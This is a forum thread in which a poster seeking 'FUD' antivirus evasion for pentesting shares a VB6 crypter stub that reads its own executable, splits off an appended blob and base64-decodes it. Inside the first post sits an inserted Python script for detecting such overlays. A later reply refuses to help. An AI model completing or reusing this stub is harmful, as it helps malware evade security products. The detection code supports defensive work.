-
Sep 7th, 2022, 04:01 PM
#1
Thread Starter
New Member
Pentesting - Crypter
Good fellow community members, I have been seeing some incredible topics on this forum,
and I got curious because in my company we are starting on the topic of AV evasion.
So I got to it and installed VB6 (I am not a programmer, I only understand the code).
I was looking for the best algorithm to encrypt the stub to be able to create a FUD, for Fortinet, Palo Alto, etc.
I just joined the red team, but as you understand I am embarrassed to go asking for help with something that to my understanding is not so complicated.
I appreciate any response. Greetings! I leave the code, the stub!
Code:
Sub main()
    Dim sMe() As String 'Array that holds the stub and the encrypted file
    Dim sDelimitador As String 'Same as in the builder
    Dim b64 As New clsBase64 'Instance of the clsBase64 class
    Dim sDescifrado As String 'Decrypted file
    Dim sBinario() As Byte 'Byte array that will hold the decrypted file
    sDelimitador = "[Blau]Delimitador[Blau]" 'IMPORTANT: same delimiter as in the builder
    sMe = SplitMyself(sDelimitador)
    '[Array] sMe
    'sMe(0) = Stub
    'sMe(1) = Encrypted file
    sDescifrado = b64.Decode(sMe(1)) 'Store the decrypted file in the variable 'sDescifrado'
    sBinario = StrConv(sDescifrado, vbFromUnicode) 'Convert the decrypted file to a byte array
End Sub
Public Function GetCurrentPath() 'Function that returns the path of this file
    GetCurrentPath = App.path & "\" & App.EXEName & ".exe"
End Function
Public Function ReadMyself() 'Function that reads its own file
    Dim ret As String
    Open GetCurrentPath For Binary As #1
    ret = Space(LOF(1))
    Get #1, , ret
    Close #1
    ReadMyself = ret
End Function
Public Function SplitMyself(sDelimitador As String) 'Function that splits the stub from the encrypted file using the delimiter
    SplitMyself = Split(ReadMyself, sDelimitador)
End Function
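Seen from the detection side, the layout this stub relies on (an executable with a delimiter and a base64 blob appended after its last section) is straightforward to flag. The following is an added example, not part of the original post: a Python check that locates the overlay of a PE file and reports whether it holds a base64-encoded MZ image. It assumes `clsBase64` is standard base64; the function names and the sample input are constructed for illustration.

```python
import base64, re, struct

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}")  # long run of base64-alphabet bytes

def overlay_offset(data: bytes) -> int:
    """File offset where the last section's raw data ends (overlay starts here)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    end = table + 40 * n_sections
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit 16 bytes into each 40-byte header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return end

def inspect_overlay(data: bytes) -> dict:
    """Report overlay size and whether it holds a base64-encoded MZ image."""
    start = overlay_offset(data)
    overlay = data[start:]
    # Decode only the first 64 characters of each run: enough to see the MZ magic.
    embedded = any(base64.b64decode(m.group()[:64]).startswith(b"MZ")
                   for m in B64_RUN.finditer(overlay))
    return {"overlay_offset": start, "overlay_size": len(overlay),
            "base64_pe_in_overlay": embedded}

def build_sample(overlay: bytes) -> bytes:
    """Constructed test input: minimal one-section PE layout plus an overlay."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    section = b".text\0\0\0" + struct.pack("<IIII", 16, 0x1000, 16, 128) + b"\0" * 16
    return dos + coff + section + b"\xCC" * 16 + overlay

if __name__ == "__main__":
    inner = base64.b64encode(b"MZ" + b"\0" * 100)  # constructed placeholder, not a program
    print(inspect_overlay(build_sample(b"[Blau]Delimitador[Blau]" + inner)))
    print(inspect_overlay(build_sample(b"")))
```

Signed binaries and installers also carry overlay data, so treat overlay size as context and the base64 MZ match as the signal worth alerting on.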
-
Sep 7th, 2022, 04:19 PM
#2
Thread Starter
New Member
Re: Pentesting - Crypter
I have seen things like CryptoSys API, is it ok?
-
Sep 10th, 2022, 11:38 AM
#3
Thread Starter
New Member
-
Sep 12th, 2022, 02:39 AM
#4
Re: Pentesting - Crypter
By AV Evasion, I assume you mean Anti Virus Evasion. If so you simply shouldn't be doing it and you're unlikely to get any help here.
Instead you should be writing your software conforming to normal Operating System Best Practice such that it doesn't appear to be a virus. If you absolutely have to break best practice in some way then you should be contacting the major Anti Virus software providers to get your software white listed and/or informing your customers that your software is likely to be detected as a virus.
If I've misunderstood and AV Evasion has some other meaning then I think you're going to have to be clearer about what you're asking.
The best argument against democracy is a five minute conversation with the average voter - Winston Churchill
Hadoop actually sounds more like the way they greet each other in Yorkshire - Inferrd